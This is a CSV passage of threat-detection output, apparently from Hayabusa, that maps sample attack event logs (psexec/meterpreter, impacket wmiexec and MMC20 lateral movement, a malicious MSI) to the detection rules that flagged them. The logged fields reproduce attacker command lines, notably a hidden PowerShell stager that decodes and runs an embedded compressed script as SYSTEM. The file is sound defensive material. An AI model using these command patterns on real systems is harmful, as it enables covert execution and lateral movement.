365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:51.981 +00:00,IEWIN7,13,high,Exec,PowerShell as a Service in Registry,,rules/sigma/registry_sysmon/registry_set/registry_set_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:51.981 +00:00,IEWIN7,13,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations in Registry,,rules/sigma/registry_sysmon/registry_set/registry_set_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.090 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3348 | PGUID: 365ABB72-AF8B-5CC8-0000-00101C1A1900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.090 +00:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent 
Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.090 +00:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.090 +00:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.090 +00:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.090 +00:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.090 +00:00,IEWIN7,1,medium,Exec | C2,Curl Start Combination,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.090 +00:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_sysmon/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.106 +00:00,IEWIN7,1,info,,Process Created,"Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 
4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 3872 | PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.106 +00:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.106 
+00:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.106 +00:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.106 +00:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.106 +00:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.106 +00:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_sysmon/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.356 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object 
System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.356 +00:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.356 +00:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.356 +00:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.356 +00:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.356 +00:00,IEWIN7,1,medium,Exec,Too Long PowerShell 
Commandlines,,rules/sigma/process_creation_sysmon/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.371 +00:00,IEWIN7,10,low,,Process Access,Src Process: 50\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3872 | Src PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900 | Tgt PID: 2484 | Tgt PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.371 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:53.152 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:33801 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:54.152 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49160 (IEWIN7) | Dst: 10.0.2.19:4444 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:32:50.902 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45616 () | User: NT AUTHORITY\SYSTEM | 
Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.168 +00:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 3840 | PGUID: 365ABB72-B0F3-5CC8-0000-00105F321D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.168 +00:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.168 +00:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.246 +00:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2504 | PGUID: 365ABB72-B0F3-5CC8-0000-0010B1361D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.246 +00:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.246 
+00:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.324 +00:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2828 | PGUID: 365ABB72-B0F3-5CC8-0000-0010C43A1D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.324 +00:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.324 +00:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.324 +00:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.371 +00:00,IEWIN7,1,info,,Process Created,Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | LID: 0x1d313d | PID: 3328 | PGUID: 365ABB72-B0F3-5CC8-0000-0010373E1D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.371 +00:00,IEWIN7,1,low,Disc,Local 
Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:51.371 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:52.402 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49162 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:32:52.402 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49162 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-04-30 20:35:11.856 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\mmc.exe -Embedding | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1ea3c6 | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:11.856 +00:00,IEWIN7,1,high,Exec,MMC20 Lateral Movement,,rules/sigma/process_creation_sysmon/proc_creation_win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:12.449 +00:00,IEWIN7,1,info,,Process 
Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1504 | PGUID: 365ABB72-B180-5CC8-0000-00102BB71E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:12.449 +00:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation_sysmon/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:12.449 +00:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.168 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45622 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.168 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49163 (IEWIN7) | Dst: 10.0.2.19:33474 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.418 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49164 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.418 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49164 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.449 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 3372 | PGUID: 365ABB72-B181-5CC8-0000-0010ADBF1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.449 +00:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation_sysmon/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.449 +00:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.512 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1256 | PGUID: 
365ABB72-B181-5CC8-0000-001023C41E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.512 +00:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation_sysmon/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.512 +00:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.512 +00:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.543 +00:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | LID: 0x1ea3c6 | PID: 692 | PGUID: 365ABB72-B181-5CC8-0000-00108DC71E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.543 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 20:35:13.543 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-04-30 22:48:58.901 
+00:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Local\Temp\302a23.msi | Process: C:\Windows\System32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:48:58.901 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-00109B5A3C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:48:59.260 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\vssvc.exe | Process: C:\Windows\System32\VSSVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-D0DB-5CC8-0000-0010488A3C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:49:08.760 +00:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Windows\Installer\304d1c.msi | Process: C:\Windows\system32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:49:07.854 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-0010216F3C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:49:09.760 +00:00,IEWIN7,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00 | Hash: 
